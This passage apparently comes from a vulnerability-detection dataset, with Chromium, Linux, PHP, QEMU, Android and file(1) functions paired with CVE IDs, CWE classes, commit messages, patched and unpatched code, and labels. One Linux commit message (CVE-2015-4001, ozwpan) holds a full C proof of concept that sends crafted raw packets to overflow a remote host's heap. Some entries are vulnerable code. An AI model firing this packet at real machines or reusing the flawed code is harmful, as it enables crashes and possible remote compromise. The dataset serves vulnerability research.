auto num_planes = input_layout.num_planes();
for (size_t i = 0; i < num_planes; i++) {
format.fmt.pix_mp.plane_fmt[i].sizeimage = input_layout.planes()[i].size;
format.fmt.pix_mp.plane_fmt[i].bytesperline =
input_layout.planes()[i].stride;
}
if (device_->Ioctl(VIDIOC_S_FMT, &format) == 0 &&
format.fmt.pix_mp.pixelformat == input_pix_fmt) {
device_input_layout_ = V4L2Device::V4L2FormatToVideoFrameLayout(format);
input_buffer_pixelformat_ = format.fmt.pix_mp.pixelformat;
input_buffer_num_planes_ = format.fmt.pix_mp.num_planes;
input_buffer_height_ = format.fmt.pix_mp.height;
break;
}
}
if (input_buffer_pixelformat_ == 0) {
VLOGF(1) << "Neither NV12 nor NV12M is supported.";
return false;
}
if (format.fmt.pix_mp.width != static_cast<uint32_t>(coded_size.width()) ||
format.fmt.pix_mp.height != static_cast<uint32_t>(coded_size.height())) {
VLOGF(1) << "Width " << coded_size.width() << "->"
<< format.fmt.pix_mp.width << ",Height " << coded_size.height()
<< "->" << format.fmt.pix_mp.height;
return false;
}
return true;
}
| C | Chrome | 0 |
CVE-2014-7906 | https://www.cvedetails.com/cve/CVE-2014-7906/ | CWE-399 | https://github.com/chromium/chromium/commit/3a2cf7d1376ae33054b878232fb38b8fbed29e31 | 3a2cf7d1376ae33054b878232fb38b8fbed29e31 | Pepper: Access PepperMediaDeviceManager through a WeakPtr
Its lifetime is scoped to the RenderFrame, and it might go away before the
hosts that refer to it.
BUG=423030
Review URL: https://codereview.chromium.org/653243003
Cr-Commit-Position: refs/heads/master@{#299897} | ScopedRequest(PepperDeviceEnumerationHostHelper* owner,
const Delegate::EnumerateDevicesCallback& callback)
: owner_(owner),
callback_(callback),
requested_(false),
request_id_(0),
sync_call_(false) {
if (!owner_->document_url_.is_valid())
return;
requested_ = true;
sync_call_ = true;
DCHECK(owner_->delegate_);
request_id_ = owner_->delegate_->EnumerateDevices(
owner_->device_type_,
owner_->document_url_,
base::Bind(&ScopedRequest::EnumerateDevicesCallbackBody, AsWeakPtr()));
sync_call_ = false;
}
| ScopedRequest(PepperDeviceEnumerationHostHelper* owner,
const Delegate::EnumerateDevicesCallback& callback)
: owner_(owner),
callback_(callback),
requested_(false),
request_id_(0),
sync_call_(false) {
if (!owner_->document_url_.is_valid())
return;
requested_ = true;
sync_call_ = true;
request_id_ = owner_->delegate_->EnumerateDevices(
owner_->device_type_,
owner_->document_url_,
base::Bind(&ScopedRequest::EnumerateDevicesCallbackBody, AsWeakPtr()));
sync_call_ = false;
}
| C | Chrome | 1 |
CVE-2018-6061 | https://www.cvedetails.com/cve/CVE-2018-6061/ | CWE-362 | https://github.com/chromium/chromium/commit/70340ce072cee8a0bdcddb5f312d32567b2269f6 | 70340ce072cee8a0bdcddb5f312d32567b2269f6 | vaapi vda: Delete owned objects on worker thread in Cleanup()
This CL adds a SEQUENCE_CHECKER to Vaapi*Accelerator classes, and
posts the destruction of those objects to the appropriate thread on
Cleanup().
Also makes {H264,VP8,VP9}Picture RefCountedThreadSafe, see miu@
comment in
https://chromium-review.googlesource.com/c/chromium/src/+/794091#message-a64bed985cfaf8a19499a517bb110a7ce581dc0f
TEST=play back VP9/VP8/H264 w/ simplechrome on soraka, Release build
unstripped, let video play for a few seconds then navigate back; no
crashes. Unittests as before:
video_decode_accelerator_unittest --test_video_data=test-25fps.vp9:320:240:250:250:35:150:12
video_decode_accelerator_unittest --test_video_data=test-25fps.vp8:320:240:250:250:35:150:11
video_decode_accelerator_unittest --test_video_data=test-25fps.h264:320:240:250:258:35:150:1
Bug: 789160
Cq-Include-Trybots: master.tryserver.chromium.android:android_optional_gpu_tests_rel;master.tryserver.chromium.linux:linux_optional_gpu_tests_rel;master.tryserver.chromium.mac:mac_optional_gpu_tests_rel;master.tryserver.chromium.win:win_optional_gpu_tests_rel
Change-Id: I7d96aaf89c92bf46f00c8b8b36798e057a842ed2
Reviewed-on: https://chromium-review.googlesource.com/794091
Reviewed-by: Pawel Osciak <posciak@chromium.org>
Commit-Queue: Miguel Casas <mcasas@chromium.org>
Cr-Commit-Position: refs/heads/master@{#523372} | VaapiVideoDecodeAccelerator::VaapiVP8Accelerator::VaapiVP8Accelerator(
VaapiVideoDecodeAccelerator* vaapi_dec,
VaapiWrapper* vaapi_wrapper)
: vaapi_wrapper_(vaapi_wrapper), vaapi_dec_(vaapi_dec) {
DCHECK(vaapi_wrapper_);
DCHECK(vaapi_dec_);
DETACH_FROM_SEQUENCE(sequence_checker_);
}
| VaapiVideoDecodeAccelerator::VaapiVP8Accelerator::VaapiVP8Accelerator(
VaapiVideoDecodeAccelerator* vaapi_dec,
VaapiWrapper* vaapi_wrapper)
: vaapi_wrapper_(vaapi_wrapper), vaapi_dec_(vaapi_dec) {
DCHECK(vaapi_wrapper_);
DCHECK(vaapi_dec_);
}
| C | Chrome | 1 |
CVE-2014-9621 | https://www.cvedetails.com/cve/CVE-2014-9621/ | CWE-399 | https://github.com/file/file/commit/65437cee25199dbd385fb35901bc0011e164276c | 65437cee25199dbd385fb35901bc0011e164276c | Limit string printing to 100 chars, and add flags I forgot in the previous
commit. | donote(struct magic_set *ms, void *vbuf, size_t offset, size_t size,
int clazz, int swap, size_t align, int *flags, uint16_t *notecount)
{
Elf32_Nhdr nh32;
Elf64_Nhdr nh64;
size_t noff, doff;
uint32_t namesz, descsz;
unsigned char *nbuf = CAST(unsigned char *, vbuf);
if (*notecount == 0)
return 0;
--*notecount;
if (xnh_sizeof + offset > size) {
/*
* We're out of note headers.
*/
return xnh_sizeof + offset;
}
(void)memcpy(xnh_addr, &nbuf[offset], xnh_sizeof);
offset += xnh_sizeof;
namesz = xnh_namesz;
descsz = xnh_descsz;
if ((namesz == 0) && (descsz == 0)) {
/*
* We're out of note headers.
*/
return (offset >= size) ? offset : size;
}
if (namesz & 0x80000000) {
(void)file_printf(ms, ", bad note name size 0x%lx",
(unsigned long)namesz);
return 0;
}
if (descsz & 0x80000000) {
(void)file_printf(ms, ", bad note description size 0x%lx",
(unsigned long)descsz);
return 0;
}
noff = offset;
doff = ELF_ALIGN(offset + namesz);
if (offset + namesz > size) {
/*
* We're past the end of the buffer.
*/
return doff;
}
offset = ELF_ALIGN(doff + descsz);
if (doff + descsz > size) {
/*
* We're past the end of the buffer.
*/
return (offset >= size) ? offset : size;
}
if ((*flags & FLAGS_DID_OS_NOTE) == 0) {
if (do_os_note(ms, nbuf, xnh_type, swap,
namesz, descsz, noff, doff, flags))
return size;
}
if ((*flags & FLAGS_DID_BUILD_ID) == 0) {
if (do_bid_note(ms, nbuf, xnh_type, swap,
namesz, descsz, noff, doff, flags))
return size;
}
if ((*flags & FLAGS_DID_NETBSD_PAX) == 0) {
if (do_pax_note(ms, nbuf, xnh_type, swap,
namesz, descsz, noff, doff, flags))
return size;
}
if ((*flags & FLAGS_DID_CORE) == 0) {
if (do_core_note(ms, nbuf, xnh_type, swap,
namesz, descsz, noff, doff, flags, size, clazz))
return size;
}
if (namesz == 7 && strcmp((char *)&nbuf[noff], "NetBSD") == 0) {
if (descsz > 100)
descsz = 100;
switch (xnh_type) {
case NT_NETBSD_VERSION:
return size;
case NT_NETBSD_MARCH:
if (*flags & FLAGS_DID_NETBSD_MARCH)
return size;
*flags |= FLAGS_DID_NETBSD_MARCH;
if (file_printf(ms, ", compiled for: %.*s",
(int)descsz, (const char *)&nbuf[doff]) == -1)
return size;
break;
case NT_NETBSD_CMODEL:
if (*flags & FLAGS_DID_NETBSD_CMODEL)
return size;
*flags |= FLAGS_DID_NETBSD_CMODEL;
if (file_printf(ms, ", compiler model: %.*s",
(int)descsz, (const char *)&nbuf[doff]) == -1)
return size;
break;
default:
if (*flags & FLAGS_DID_NETBSD_UNKNOWN)
return size;
*flags |= FLAGS_DID_NETBSD_UNKNOWN;
if (file_printf(ms, ", note=%u", xnh_type) == -1)
return size;
break;
}
return size;
}
return offset;
}
| donote(struct magic_set *ms, void *vbuf, size_t offset, size_t size,
int clazz, int swap, size_t align, int *flags, uint16_t *notecount)
{
Elf32_Nhdr nh32;
Elf64_Nhdr nh64;
size_t noff, doff;
uint32_t namesz, descsz;
unsigned char *nbuf = CAST(unsigned char *, vbuf);
if (*notecount == 0)
return 0;
--*notecount;
if (xnh_sizeof + offset > size) {
/*
* We're out of note headers.
*/
return xnh_sizeof + offset;
}
(void)memcpy(xnh_addr, &nbuf[offset], xnh_sizeof);
offset += xnh_sizeof;
namesz = xnh_namesz;
descsz = xnh_descsz;
if ((namesz == 0) && (descsz == 0)) {
/*
* We're out of note headers.
*/
return (offset >= size) ? offset : size;
}
if (namesz & 0x80000000) {
(void)file_printf(ms, ", bad note name size 0x%lx",
(unsigned long)namesz);
return 0;
}
if (descsz & 0x80000000) {
(void)file_printf(ms, ", bad note description size 0x%lx",
(unsigned long)descsz);
return 0;
}
noff = offset;
doff = ELF_ALIGN(offset + namesz);
if (offset + namesz > size) {
/*
* We're past the end of the buffer.
*/
return doff;
}
offset = ELF_ALIGN(doff + descsz);
if (doff + descsz > size) {
/*
* We're past the end of the buffer.
*/
return (offset >= size) ? offset : size;
}
if ((*flags & FLAGS_DID_OS_NOTE) == 0) {
if (do_os_note(ms, nbuf, xnh_type, swap,
namesz, descsz, noff, doff, flags))
return size;
}
if ((*flags & FLAGS_DID_BUILD_ID) == 0) {
if (do_bid_note(ms, nbuf, xnh_type, swap,
namesz, descsz, noff, doff, flags))
return size;
}
if ((*flags & FLAGS_DID_NETBSD_PAX) == 0) {
if (do_pax_note(ms, nbuf, xnh_type, swap,
namesz, descsz, noff, doff, flags))
return size;
}
if ((*flags & FLAGS_DID_CORE) == 0) {
if (do_core_note(ms, nbuf, xnh_type, swap,
namesz, descsz, noff, doff, flags, size, clazz))
return size;
}
if (namesz == 7 && strcmp((char *)&nbuf[noff], "NetBSD") == 0) {
switch (xnh_type) {
case NT_NETBSD_VERSION:
return size;
case NT_NETBSD_MARCH:
if (*flags & FLAGS_DID_NETBSD_MARCH)
return size;
if (file_printf(ms, ", compiled for: %.*s", (int)descsz,
(const char *)&nbuf[doff]) == -1)
return size;
break;
case NT_NETBSD_CMODEL:
if (*flags & FLAGS_DID_NETBSD_CMODEL)
return size;
if (file_printf(ms, ", compiler model: %.*s",
(int)descsz, (const char *)&nbuf[doff]) == -1)
return size;
break;
default:
if (*flags & FLAGS_DID_NETBSD_UNKNOWN)
return size;
if (file_printf(ms, ", note=%u", xnh_type) == -1)
return size;
break;
}
return size;
}
return offset;
}
| C | file | 1 |
CVE-2016-0810 | https://www.cvedetails.com/cve/CVE-2016-0810/ | CWE-264 | https://android.googlesource.com/platform%2Fframeworks%2Fav/+/19c47afbc402542720ddd280e1bbde3b2277b586 | 19c47afbc402542720ddd280e1bbde3b2277b586 | DO NOT MERGE SoundPool: add lock for findSample access from SoundPoolThread
Sample decoding still occurs in SoundPoolThread
without holding the SoundPool lock.
Bug: 25781119
Change-Id: I11fde005aa9cf5438e0390a0d2dfe0ec1dd282e8
| bool SoundPool::unload(int sampleID)
{
ALOGV("unload: sampleID=%d", sampleID);
Mutex::Autolock lock(&mLock);
return mSamples.removeItem(sampleID);
}
| bool SoundPool::unload(int sampleID)
{
ALOGV("unload: sampleID=%d", sampleID);
Mutex::Autolock lock(&mLock);
return mSamples.removeItem(sampleID);
}
| C | Android | 0 |
CVE-2017-11144 | https://www.cvedetails.com/cve/CVE-2017-11144/ | CWE-754 | https://git.php.net/?p=php-src.git;a=commit;h=91826a311dd37f4c4e5d605fa7af331e80ddd4c3 | 91826a311dd37f4c4e5d605fa7af331e80ddd4c3 | null | PHP_FUNCTION(openssl_pkey_get_details)
{
zval *key;
EVP_PKEY *pkey;
BIO *out;
unsigned int pbio_len;
char *pbio;
zend_long ktype;
if (zend_parse_parameters(ZEND_NUM_ARGS(), "r", &key) == FAILURE) {
return;
}
if ((pkey = (EVP_PKEY *)zend_fetch_resource(Z_RES_P(key), "OpenSSL key", le_key)) == NULL) {
RETURN_FALSE;
}
out = BIO_new(BIO_s_mem());
if (!PEM_write_bio_PUBKEY(out, pkey)) {
BIO_free(out);
php_openssl_store_errors();
RETURN_FALSE;
}
pbio_len = BIO_get_mem_data(out, &pbio);
array_init(return_value);
add_assoc_long(return_value, "bits", EVP_PKEY_bits(pkey));
add_assoc_stringl(return_value, "key", pbio, pbio_len);
/*TODO: Use the real values once the openssl constants are used
* See the enum at the top of this file
*/
switch (EVP_PKEY_base_id(pkey)) {
case EVP_PKEY_RSA:
case EVP_PKEY_RSA2:
{
RSA *rsa = EVP_PKEY_get0_RSA(pkey);
ktype = OPENSSL_KEYTYPE_RSA;
if (rsa != NULL) {
zval z_rsa;
const BIGNUM *n, *e, *d, *p, *q, *dmp1, *dmq1, *iqmp;
RSA_get0_key(rsa, &n, &e, &d);
RSA_get0_factors(rsa, &p, &q);
RSA_get0_crt_params(rsa, &dmp1, &dmq1, &iqmp);
array_init(&z_rsa);
OPENSSL_PKEY_GET_BN(z_rsa, n);
OPENSSL_PKEY_GET_BN(z_rsa, e);
OPENSSL_PKEY_GET_BN(z_rsa, d);
OPENSSL_PKEY_GET_BN(z_rsa, p);
OPENSSL_PKEY_GET_BN(z_rsa, q);
OPENSSL_PKEY_GET_BN(z_rsa, dmp1);
OPENSSL_PKEY_GET_BN(z_rsa, dmq1);
OPENSSL_PKEY_GET_BN(z_rsa, iqmp);
add_assoc_zval(return_value, "rsa", &z_rsa);
}
}
break;
case EVP_PKEY_DSA:
case EVP_PKEY_DSA2:
case EVP_PKEY_DSA3:
case EVP_PKEY_DSA4:
{
DSA *dsa = EVP_PKEY_get0_DSA(pkey);
ktype = OPENSSL_KEYTYPE_DSA;
if (dsa != NULL) {
zval z_dsa;
const BIGNUM *p, *q, *g, *priv_key, *pub_key;
DSA_get0_pqg(dsa, &p, &q, &g);
DSA_get0_key(dsa, &pub_key, &priv_key);
array_init(&z_dsa);
OPENSSL_PKEY_GET_BN(z_dsa, p);
OPENSSL_PKEY_GET_BN(z_dsa, q);
OPENSSL_PKEY_GET_BN(z_dsa, g);
OPENSSL_PKEY_GET_BN(z_dsa, priv_key);
OPENSSL_PKEY_GET_BN(z_dsa, pub_key);
add_assoc_zval(return_value, "dsa", &z_dsa);
}
}
break;
case EVP_PKEY_DH:
{
DH *dh = EVP_PKEY_get0_DH(pkey);
ktype = OPENSSL_KEYTYPE_DH;
if (dh != NULL) {
zval z_dh;
const BIGNUM *p, *q, *g, *priv_key, *pub_key;
DH_get0_pqg(dh, &p, &q, &g);
DH_get0_key(dh, &pub_key, &priv_key);
array_init(&z_dh);
OPENSSL_PKEY_GET_BN(z_dh, p);
OPENSSL_PKEY_GET_BN(z_dh, g);
OPENSSL_PKEY_GET_BN(z_dh, priv_key);
OPENSSL_PKEY_GET_BN(z_dh, pub_key);
add_assoc_zval(return_value, "dh", &z_dh);
}
}
break;
#ifdef HAVE_EVP_PKEY_EC
case EVP_PKEY_EC:
ktype = OPENSSL_KEYTYPE_EC;
if (EVP_PKEY_get0_EC_KEY(pkey) != NULL) {
zval ec;
const EC_GROUP *ec_group;
const EC_POINT *pub;
int nid;
char *crv_sn;
ASN1_OBJECT *obj;
char oir_buf[80];
const EC_KEY *ec_key = EVP_PKEY_get0_EC_KEY(pkey);
BIGNUM *x = BN_new();
BIGNUM *y = BN_new();
const BIGNUM *d;
ec_group = EC_KEY_get0_group(ec_key);
nid = EC_GROUP_get_curve_name(ec_group);
if (nid == NID_undef) {
break;
}
array_init(&ec);
crv_sn = (char*) OBJ_nid2sn(nid);
if (crv_sn != NULL) {
add_assoc_string(&ec, "curve_name", crv_sn);
}
obj = OBJ_nid2obj(nid);
if (obj != NULL) {
int oir_len = OBJ_obj2txt(oir_buf, sizeof(oir_buf), obj, 1);
add_assoc_stringl(&ec, "curve_oid", (char*) oir_buf, oir_len);
ASN1_OBJECT_free(obj);
}
pub = EC_KEY_get0_public_key(ec_key);
if (EC_POINT_get_affine_coordinates_GFp(ec_group, pub, x, y, NULL)) {
OPENSSL_GET_BN(ec, x, x);
OPENSSL_GET_BN(ec, y, y);
} else {
php_openssl_store_errors();
}
if ((d = EC_KEY_get0_private_key(EVP_PKEY_get0_EC_KEY(pkey))) != NULL) {
OPENSSL_GET_BN(ec, d, d);
}
add_assoc_zval(return_value, "ec", &ec);
BN_free(x);
BN_free(y);
}
break;
#endif
default:
ktype = -1;
break;
}
add_assoc_long(return_value, "type", ktype);
BIO_free(out);
}
| PHP_FUNCTION(openssl_pkey_get_details)
{
zval *key;
EVP_PKEY *pkey;
BIO *out;
unsigned int pbio_len;
char *pbio;
zend_long ktype;
if (zend_parse_parameters(ZEND_NUM_ARGS(), "r", &key) == FAILURE) {
return;
}
if ((pkey = (EVP_PKEY *)zend_fetch_resource(Z_RES_P(key), "OpenSSL key", le_key)) == NULL) {
RETURN_FALSE;
}
out = BIO_new(BIO_s_mem());
if (!PEM_write_bio_PUBKEY(out, pkey)) {
BIO_free(out);
php_openssl_store_errors();
RETURN_FALSE;
}
pbio_len = BIO_get_mem_data(out, &pbio);
array_init(return_value);
add_assoc_long(return_value, "bits", EVP_PKEY_bits(pkey));
add_assoc_stringl(return_value, "key", pbio, pbio_len);
/*TODO: Use the real values once the openssl constants are used
* See the enum at the top of this file
*/
switch (EVP_PKEY_base_id(pkey)) {
case EVP_PKEY_RSA:
case EVP_PKEY_RSA2:
{
RSA *rsa = EVP_PKEY_get0_RSA(pkey);
ktype = OPENSSL_KEYTYPE_RSA;
if (rsa != NULL) {
zval z_rsa;
const BIGNUM *n, *e, *d, *p, *q, *dmp1, *dmq1, *iqmp;
RSA_get0_key(rsa, &n, &e, &d);
RSA_get0_factors(rsa, &p, &q);
RSA_get0_crt_params(rsa, &dmp1, &dmq1, &iqmp);
array_init(&z_rsa);
OPENSSL_PKEY_GET_BN(z_rsa, n);
OPENSSL_PKEY_GET_BN(z_rsa, e);
OPENSSL_PKEY_GET_BN(z_rsa, d);
OPENSSL_PKEY_GET_BN(z_rsa, p);
OPENSSL_PKEY_GET_BN(z_rsa, q);
OPENSSL_PKEY_GET_BN(z_rsa, dmp1);
OPENSSL_PKEY_GET_BN(z_rsa, dmq1);
OPENSSL_PKEY_GET_BN(z_rsa, iqmp);
add_assoc_zval(return_value, "rsa", &z_rsa);
}
}
break;
case EVP_PKEY_DSA:
case EVP_PKEY_DSA2:
case EVP_PKEY_DSA3:
case EVP_PKEY_DSA4:
{
DSA *dsa = EVP_PKEY_get0_DSA(pkey);
ktype = OPENSSL_KEYTYPE_DSA;
if (dsa != NULL) {
zval z_dsa;
const BIGNUM *p, *q, *g, *priv_key, *pub_key;
DSA_get0_pqg(dsa, &p, &q, &g);
DSA_get0_key(dsa, &pub_key, &priv_key);
array_init(&z_dsa);
OPENSSL_PKEY_GET_BN(z_dsa, p);
OPENSSL_PKEY_GET_BN(z_dsa, q);
OPENSSL_PKEY_GET_BN(z_dsa, g);
OPENSSL_PKEY_GET_BN(z_dsa, priv_key);
OPENSSL_PKEY_GET_BN(z_dsa, pub_key);
add_assoc_zval(return_value, "dsa", &z_dsa);
}
}
break;
case EVP_PKEY_DH:
{
DH *dh = EVP_PKEY_get0_DH(pkey);
ktype = OPENSSL_KEYTYPE_DH;
if (dh != NULL) {
zval z_dh;
const BIGNUM *p, *q, *g, *priv_key, *pub_key;
DH_get0_pqg(dh, &p, &q, &g);
DH_get0_key(dh, &pub_key, &priv_key);
array_init(&z_dh);
OPENSSL_PKEY_GET_BN(z_dh, p);
OPENSSL_PKEY_GET_BN(z_dh, g);
OPENSSL_PKEY_GET_BN(z_dh, priv_key);
OPENSSL_PKEY_GET_BN(z_dh, pub_key);
add_assoc_zval(return_value, "dh", &z_dh);
}
}
break;
#ifdef HAVE_EVP_PKEY_EC
case EVP_PKEY_EC:
ktype = OPENSSL_KEYTYPE_EC;
if (EVP_PKEY_get0_EC_KEY(pkey) != NULL) {
zval ec;
const EC_GROUP *ec_group;
const EC_POINT *pub;
int nid;
char *crv_sn;
ASN1_OBJECT *obj;
char oir_buf[80];
const EC_KEY *ec_key = EVP_PKEY_get0_EC_KEY(pkey);
BIGNUM *x = BN_new();
BIGNUM *y = BN_new();
const BIGNUM *d;
ec_group = EC_KEY_get0_group(ec_key);
nid = EC_GROUP_get_curve_name(ec_group);
if (nid == NID_undef) {
break;
}
array_init(&ec);
crv_sn = (char*) OBJ_nid2sn(nid);
if (crv_sn != NULL) {
add_assoc_string(&ec, "curve_name", crv_sn);
}
obj = OBJ_nid2obj(nid);
if (obj != NULL) {
int oir_len = OBJ_obj2txt(oir_buf, sizeof(oir_buf), obj, 1);
add_assoc_stringl(&ec, "curve_oid", (char*) oir_buf, oir_len);
ASN1_OBJECT_free(obj);
}
pub = EC_KEY_get0_public_key(ec_key);
if (EC_POINT_get_affine_coordinates_GFp(ec_group, pub, x, y, NULL)) {
OPENSSL_GET_BN(ec, x, x);
OPENSSL_GET_BN(ec, y, y);
} else {
php_openssl_store_errors();
}
if ((d = EC_KEY_get0_private_key(EVP_PKEY_get0_EC_KEY(pkey))) != NULL) {
OPENSSL_GET_BN(ec, d, d);
}
add_assoc_zval(return_value, "ec", &ec);
BN_free(x);
BN_free(y);
}
break;
#endif
default:
ktype = -1;
break;
}
add_assoc_long(return_value, "type", ktype);
BIO_free(out);
}
| C | php | 0 |
CVE-2015-1805 | https://www.cvedetails.com/cve/CVE-2015-1805/ | CWE-17 | https://github.com/torvalds/linux/commit/f0d1bec9d58d4c038d0ac958c9af82be6eb18045 | f0d1bec9d58d4c038d0ac958c9af82be6eb18045 | new helper: copy_page_from_iter()
parallel to copy_page_to_iter(). pipe_write() switched to it (and became
->write_iter()).
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk> | static inline void __pipe_unlock(struct pipe_inode_info *pipe)
{
mutex_unlock(&pipe->mutex);
}
| static inline void __pipe_unlock(struct pipe_inode_info *pipe)
{
mutex_unlock(&pipe->mutex);
}
| C | linux | 0 |
CVE-2015-4001 | https://www.cvedetails.com/cve/CVE-2015-4001/ | CWE-189 | https://github.com/torvalds/linux/commit/b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c | b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c | ozwpan: Use unsigned ints to prevent heap overflow
Using signed integers, the subtraction between required_size and offset
could wind up being negative, resulting in a memcpy into a heap buffer
with a negative length, resulting in huge amounts of network-supplied
data being copied into the heap, which could potentially lead to remote
code execution.. This is remotely triggerable with a magic packet.
A PoC which obtains DoS follows below. It requires the ozprotocol.h file
from this module.
=-=-=-=-=-=
#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <endian.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define __packed __attribute__((__packed__))
#include "ozprotocol.h"
static int hex2num(char c)
{
if (c >= '0' && c <= '9')
return c - '0';
if (c >= 'a' && c <= 'f')
return c - 'a' + 10;
if (c >= 'A' && c <= 'F')
return c - 'A' + 10;
return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
int i;
for (i = 0; i < 6; i++) {
int a, b;
a = hex2num(*txt++);
if (a < 0)
return -1;
b = hex2num(*txt++);
if (b < 0)
return -1;
*addr++ = (a << 4) | b;
if (i < 5 && *txt++ != ':')
return -1;
}
return 0;
}
int main(int argc, char *argv[])
{
if (argc < 3) {
fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
return 1;
}
uint8_t dest_mac[6];
if (hwaddr_aton(argv[2], dest_mac)) {
fprintf(stderr, "Invalid mac address.\n");
return 1;
}
int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (sockfd < 0) {
perror("socket");
return 1;
}
struct ifreq if_idx;
int interface_index;
strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
perror("SIOCGIFINDEX");
return 1;
}
interface_index = if_idx.ifr_ifindex;
if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
perror("SIOCGIFHWADDR");
return 1;
}
uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_elt_connect_req oz_elt_connect_req;
} __packed connect_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(0)
},
.oz_elt = {
.type = OZ_ELT_CONNECT_REQ,
.length = sizeof(struct oz_elt_connect_req)
},
.oz_elt_connect_req = {
.mode = 0,
.resv1 = {0},
.pd_info = 0,
.session_id = 0,
.presleep = 35,
.ms_isoc_latency = 0,
.host_vendor = 0,
.keep_alive = 0,
.apps = htole16((1 << OZ_APPID_USB) | 0x1),
.max_len_div16 = 0,
.ms_per_isoc = 0,
.up_audio_buf = 0,
.ms_per_elt = 0
}
};
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_get_desc_rsp oz_get_desc_rsp;
} __packed pwn_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(1)
},
.oz_elt = {
.type = OZ_ELT_APP_DATA,
.length = sizeof(struct oz_get_desc_rsp)
},
.oz_get_desc_rsp = {
.app_id = OZ_APPID_USB,
.elt_seq_num = 0,
.type = OZ_GET_DESC_RSP,
.req_id = 0,
.offset = htole16(2),
.total_size = htole16(1),
.rcode = 0,
.data = {0}
}
};
struct sockaddr_ll socket_address = {
.sll_ifindex = interface_index,
.sll_halen = ETH_ALEN,
.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
};
if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
usleep(300000);
if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
return 0;
}
Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>
Acked-by: Dan Carpenter <dan.carpenter@oracle.com>
Cc: stable <stable@vger.kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org> | static struct oz_urb_link *oz_remove_urb(struct oz_endpoint *ep,
struct urb *urb)
{
struct oz_urb_link *urbl;
if (unlikely(ep == NULL))
return NULL;
list_for_each_entry(urbl, &ep->urb_list, link) {
if (urbl->urb == urb) {
list_del_init(&urbl->link);
if (usb_pipeisoc(urb->pipe)) {
ep->credit -= urb->number_of_packets;
if (ep->credit < 0)
ep->credit = 0;
}
return urbl;
}
}
return NULL;
}
| static struct oz_urb_link *oz_remove_urb(struct oz_endpoint *ep,
struct urb *urb)
{
struct oz_urb_link *urbl;
if (unlikely(ep == NULL))
return NULL;
list_for_each_entry(urbl, &ep->urb_list, link) {
if (urbl->urb == urb) {
list_del_init(&urbl->link);
if (usb_pipeisoc(urb->pipe)) {
ep->credit -= urb->number_of_packets;
if (ep->credit < 0)
ep->credit = 0;
}
return urbl;
}
}
return NULL;
}
| C | linux | 0 |
CVE-2017-9375 | https://www.cvedetails.com/cve/CVE-2017-9375/ | CWE-835 | https://git.qemu.org/?p=qemu.git;a=commit;h=96d87bdda3919bb16f754b3d3fd1227e1f38f13c | 96d87bdda3919bb16f754b3d3fd1227e1f38f13c | null | static TRBCCode xhci_disable_slot(XHCIState *xhci, unsigned int slotid)
{
int i;
trace_usb_xhci_slot_disable(slotid);
assert(slotid >= 1 && slotid <= xhci->numslots);
for (i = 1; i <= 31; i++) {
if (xhci->slots[slotid-1].eps[i-1]) {
xhci_disable_ep(xhci, slotid, i);
}
}
xhci->slots[slotid-1].enabled = 0;
xhci->slots[slotid-1].addressed = 0;
xhci->slots[slotid-1].uport = NULL;
return CC_SUCCESS;
}
| static TRBCCode xhci_disable_slot(XHCIState *xhci, unsigned int slotid)
{
int i;
trace_usb_xhci_slot_disable(slotid);
assert(slotid >= 1 && slotid <= xhci->numslots);
for (i = 1; i <= 31; i++) {
if (xhci->slots[slotid-1].eps[i-1]) {
xhci_disable_ep(xhci, slotid, i);
}
}
xhci->slots[slotid-1].enabled = 0;
xhci->slots[slotid-1].addressed = 0;
xhci->slots[slotid-1].uport = NULL;
return CC_SUCCESS;
}
| C | qemu | 0 |
CVE-2017-5013 | https://www.cvedetails.com/cve/CVE-2017-5013/ | null | https://github.com/chromium/chromium/commit/8f3a9a68b2dcdd2c54cf49a41ad34729ab576702 | 8f3a9a68b2dcdd2c54cf49a41ad34729ab576702 | Don't focus the location bar for NTP navigations in non-selected tabs.
BUG=677716
TEST=See bug for repro steps.
Review-Url: https://codereview.chromium.org/2624373002
